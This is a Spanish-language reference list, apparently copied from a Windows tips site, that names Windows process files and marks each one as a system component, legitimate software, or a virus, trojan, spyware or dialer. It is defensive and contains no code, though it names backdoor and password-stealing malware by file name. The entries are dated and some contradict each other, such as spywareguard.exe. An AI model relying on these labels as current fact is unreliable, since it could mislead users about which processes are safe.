rnaapp.exe Remote Access Parte de Windows, se carga mientras dura la conexión con modem
RNAthChk.exe Real Networks update Parte de RealOne Player. No necesario.
RNDAL.exe Dynamic Application Launcher Parte de RealOne Player, mira si hay actualizaciones
rpcss.exe Remote Procedure Call Parte de Windows, más información aquí
RRAM.exe Release RAM Release RAM, libera memoria, no hace nada util (ver esta página)
rscmpt.exe Emulador de RAM para Geforce MX Simula 64 Mb en tarjetas con 32 Mb, ralentiza mucho el sistema
rsrcmtr.exe Medidor de recursos Parte de Windows
rtvscan.exe Real Time Virus Scan service Parte de Norton Anti-Virus 7.x para Windows NT/2000
RuLaunch.exe McAfee InstantUpdate Parte de McAfee VirusScan y Firewall
Run_cd.exe Virus Virus GHOST.23
Runapp32.exe Virus Virus NEODURK
rundli32.exe Virus Virus LADE
RunDll16.exe RDLL Virus SDBOT.F
rundll32.exe Windows RUNDLL32 Helper Parte de Windows, aunque no debería estar cargada permanentemente
RxMon.exe Roxio Audio Central Parte de Roxio EasyCD Creator 6.0, no necesario
savenow.exe Advertising spyware / Virus Ver información aquí. Virus SPREDA.B
Scam32.exe Virus Virus SIRCAM
ScardSvr.exe Smart Card Sólo necesario si usamos un dispositivo de este tipo
ScrSvr.exe Virus Virus OPASOFT.A
ScsiAccess.EXE * Alcohol 120% Software. Virtual SCSI controller Controladora virtual SCSI. Necesario si usamos este software
sentry.exe IP Insight Tracking software Envía información sobre nuestra ubicación y uso de Internet
Server.exe Virus Virus OPTIX.04.A, SMOKODOOR, DELTAD.A o EASYSERV
server.exe * Pinnacle STUDIO PCTV Servicio de Pinnacle PCTV
services.exe * Services Control Manager Servicio de Windows, arranca y para los servicios
SETI@home.exe Setiathome client Analiza señales captadas por radiotelescopios
sgmain.exe SpywareGuard Parte de este anti-spyware
Shell32.exe Virus Virus BADSECTOR
shellexpl.exe Virus Virus Gpix. Más información aquí, aquí y aquí
shost.exe Virus Virus YODO
showbehind.exe Adware / Spyware Viene con varios programas gratuitos, muestra publicidad
Ska.exe Virus Virus NETBUS
skinkers.exe Howard the Weatherman desktop client Muestra publicidad. Más información aquí
smartctr.exe Lotus SmartCenter Consume demasiado y no hace nada útil
smss.exe * Session Manager SubSystem Parte de Windows
sndrec32.exe Grabadora de sonidos Parte de Windows
sndvol32.exe Control de volumen Parte de Windows
snmp.exe * Microsoft SNMP Agent Parte de Windows, reenvía paquetes SNMP a la red adecuada
sp.exe Adware - troyano Redirecciona la pagina de inicio
spoler.exe Virus Virus RANDEX.J
spool32.exe Printer Spooler Parte de Windows. Gestiona la cola de impresión
spoolss.exe Printer Spooler Subsystem Parte de Windows. Gestiona la cola de impresión
spoolsv.exe * Printer Spooler Service Parte de Windows. Gestiona la cola de impresión
Sp00lsv.exe Virus Virus GRAYBIRD.E
SpySweeper.exe * Spy Sweeper Agente de Spy Swweper, proteccion anti troyanos, guanos, etc aplicacion
spywareguard.exe Advertising Spyware Ver información aquí y herramienta para eliminarlo aquí
ssdpsrv.exe Simple Service Discovery Protocol Parte de Windows (Universal Plug and Play)
starter.exe Ensoniq Mixer Tray icon No hace nada realmente útil
statemgr.exe System Restore Parte de Windows
Stimon.exe Still Image Monitor Necesario para el funcionamiento de escáneres y cámaras digitales
stisvc.exe Still Image Service Parte de Windows,
stub.exe Kazaa/Ezula/TopText Scumware Ver información aquí
StyleXP.exe StyleXP Permite cambiar la apariencia de Windows
slvchost32.exe Worm - Virus slvchost32.exe
svchosl.exe Virus Virus GAOBOT.P
svchost.exe * Service Host Process Parte de Windows. Agrupa varios servicios. Ver Q250320
svchosts.exe Virus Virus SDBOT
svch0st.exe Virus Virus GRAYBIRD
svxhost.exe Worm - Virus svxhost.exe
swoff.exe Switch Off Permite programar el apagado, desconexión y más cosas
Synchost.exe Remote Access Slave Virus RIPJAC
syntpenh.exe Enhaced Touchpad Añade funcionalidad al touchpad
syntplpr.exe Synaptics Touchpad Añade funcionalidad al touchpad
sysconf.exe Virus Virus SDBOT
sysldr32.exe Virus Virus GAOBOT
sysreg.exe Spyware / hijackware Cambia la configuración del Internet Explorer, muestra publicidad
system.exe Virus Virus CHILI, NULLBOT, FULAMER.25 o GATECRASH.A
System32.exe Virus Virus KWBOT.C, MARI o SYSXXX
systray.exe System Tray Parte de Windows (iconos en la parte derecha de la barra de tareas)
systray32.exe Virus Virus DABOOM
tapisrv.exe TAPI Service Parte de Windows (soporte para telefonía)
taskmgr.exe * Administrador de tareas Parte de Windows, es el propio Administrador de tareas
taskmon.exe Windows Task Optimizer Parte de Windows, no necesario
TaskTray.exe Spyware Ver más información aquí
tca.exe The Cleaner Parte de este antivirus
tcaudiag.exe Diagnostic program for 3COM NIC No hace nada realmente útil
tcpsvcs.exe * TCP/IP Services Application Microsoft Windows Operating System
teekids.exe Virus Virus BLASTER.C
TFncKy Toshiba Controls Se carga para que funcionen los botones extra en portátiles Toshiba
THotkey.exe Toshiba Hotkey Utility Necesario para que funcionen algunas combinaciones de teclas en portátiles
Toshibsu.exe Toshiba Power Control Necesario pata las funciones de ahorro de energía
TosHKCW.exe Wireless Hotkey Utilidad usada en portátiles Toshiba
TouchED.Exe TouchPad Controls Añade funcionalidad al touchpad en portátiles Toshiba
trillian.exe Trillian Programa de mensajería instantánea
tsyssmon.exe System Monitor Monitoriza el funcionamiento del sistema en portátiles Toshiba
tsystray.exe Real Jukebox Systray Icono de RealJukebox, no necesario
ttps.exe Spyware / hijackware Cambia la página de búsqueda del Internet Explorer, muestra publicidad
Tweak-xp.exe Tweak-XP Permite cambiar varias configuraciones de Windows XP
ud.exe United Devices Agent Colabora en un proyecto de computación distribuida
umxagent.exe Tiny Personal Firewall Parte de esta firewall
updreg.exe SoundBlaster Live! Reminder No hace nada realmente útil
userinit.exe UserInit Process Parte de Windows, ejecuta scripts de logon
vbptask.exe RestoreIT! Parte de FarStone RestoreIT!
Virus_Cleaner.exe Virus Virus PANOL
visio.exe Microsoft Visio Programa para hacer esquemas
Vision.exe * Pinnacle STUDIO PCTV Componente de Pinnacle PCTV
vmnat.exe VMware NAT Parte de VMware
vmnetdhcp.exe VMware DHCP Parte de VMware
vmware.exe VMware VMware
vmware-vmx.exe VMware Virtual Machine Máquina virtual ejecutándose
vpnservices.exe Symantec VPN Client No necesario si no se usa este software en particular
vptray.exe Norton AntiVirus Parte de Norton AntiVirus
vshwin32.exe * McAfee VirusScan Parte de McAfee VirusScan
vsmon.exe * True Vector Internet Monitor Parte de ZoneAlarm
vssvc.exe Volume Shadow Copy Parte de Windows 2003 server
VSStat.exe * VirusScan MSC Parte de McAfee VirusScan
wab.exe Libreta de direcciones Parte de Windows
wanobsi.exe Adware Modifica la página de búsqueda del Internet Explorer
washer.exe Windows Washer Elimina ficheros temporales, cookies, historial, etc
wbload.exe WindowBlinds Permite cambiar la apariencia de Windows
webscanx.exe McAfee VirusScan Parte de McAfee VirusScan
win32_i.exe Advertising Spyware Ver información aquí y herramienta para eliminarlo aquí
win32API.exe Homepage hijacker Cambia la página de inicio del Internet Explorer, ver aquí
win32us.exe Dialer All-In-One Telcom Se conecta con webs pornográficas, más información aquí
winadm.exe Parents Friend Permite controlar el horario de uso y proteger programas con una clave
winamp.exe * Winamp Winamp
Winampa.exe * Winamp Agent Parte de Winamp, no necesario
WINANMPX.EXE Worm Gusano de internet
Wincfg32.exe Virus Virus SILVERFTP
wincomp.exe Troyano Más información aquí
windex.exe Virus Virus GAOBOT.BM
windfind.exe Dialer Más información aquí
Windll.exe Virus Virus TRYNOMA o STEALER
Windll32.exe Virus Virus MSNPWS, ASTEF o RESPAN
Windows.exe Virus Virus QQPASS.E, KAZMOR, BOBBINS o ALADINZ.D
winhelp.exe Virus Virus LOVGATE.G
winhlp32.exe Windows Help File viewer Parte de Windows
winhlpp32.exe Virus Virus wW32/Gaobot.FT
winkrnl386.exe Virus Virus ZEBROXY
Winmgm32.exe Virus Virus SOBIG o LALA.C
Wininit.exe Virus Virus BYMER
winlogin.exe Virus Virus RANDEX.E
winlogon.exe * Windows Logon Process Parte de Windows, se encarga de iniciar y cerrar las sesiones
winmgmt.exe Windows Management Service Parte de Windows, aunque no es normal que esté activo
winnet.exe CommonName Toolbar Uno de los peores spywares, se instala con imesh. Ver esta página.
winproj.exe Microsoft Project Microsoft Project
WinProxy.exe WinProxy Proxy / Firewall
winrecon.exe WinRecon Monitoriza y registra todo lo que se hace en el PC
winroute.exe WinRoute WinRoute (Firewall / Router)
winserv.exe Adware / Spyware / Virus Parte de Intelligent Explorer, instala BargainBuddy/Apuc o EVILBOT.C o IMISERV
WinServices.exe Virus Virus YAHA.K o YAHA.M
winservn.exe Adware / Spyware Spyware PurityScan
Winsys32.exe Virus Virus CIGIVIP o RECKUS
winsystem.exe Virus Virus WHITEBAIT
Wintask.exe Virus Virus HIPO, NAVIDAD o LEMIR.F
winupdate.exe Virus Virus BMBOT o RADO
WinVNC.exe WinVNC Software de control remoto
winword.exe * Microsoft Word Parte de Microsoft Office
winz32.exe Virus Virus KWBOT.Z o SDBOT.Q
winzip32.exe * Winzip WinZip
WISPTIS.EXE * Microsoft Tablet PC Platform Component Microsoft Windows Operating System
wkcalrem.exe Microsoft Works Calendar Reminder Parte de Microsoft Works
WkDetect.exe MS Works Update Parte de Microsoft Works, no necesario para que funcione
WkUFind.exe Microsoft Works Update Detection Parte de Microsoft Works, no necesario para que funcione
wmexe.exe WinModem drivers WinModem drivers
wmiapsrv.exe * Servicio de rendimiento de adaptador de WMI Sistema operativo Microsoft Windows
wmiexe.exe IEEE 1394 device detector Necesario en Windows Me para trabajar con dispositivos firewire
wmplayer.exe Windows Media Player Parte de Windows
wnad.exe Adware / Spyware Muestra publicidad. Ver más información aquí
wordpad.exe * Wordpad Parte de Windows
wowexec.exe Windows On Windows Execution Parte de Windows, para ejecutar aplicaciones de 16 bits
wpwin8.exe WordPerfect 8 Corel WordPerfect for Windows 8
wsys.exe Virus Virus MANIFEST
wupdated.exe Virus Virus MOEGA
wupdt.exe Adware / Spyware Parte de Intelligent Explorer, instala BargainBuddy/Apuc, Virus IMISERV
wwasher.exe WebWasher Filtra publicidad en Internet Explorer
wzqkpick.exe WinZip QuickPick Icono de Winzip en la barra de tareas, consumo innecesario
xadbrk.exe AdBreak advertising spyware Ver información aquí
XupiterStartup.exe Xupiter Ver información aquí, aquí y aquí
ypager.exe Yahoo! Pager Servicio de Yahoo Messenger
zapro.exe * ZoneAlarm Pro Firewall ZoneAlarm Pro
zonealarm.exe * ZoneAlarm Firewall ZoneAlarm
zclient.exe * ZoneAlarm Pro 4.5 Firewall ZoneAlarm

(tomado de trucoswindows.net)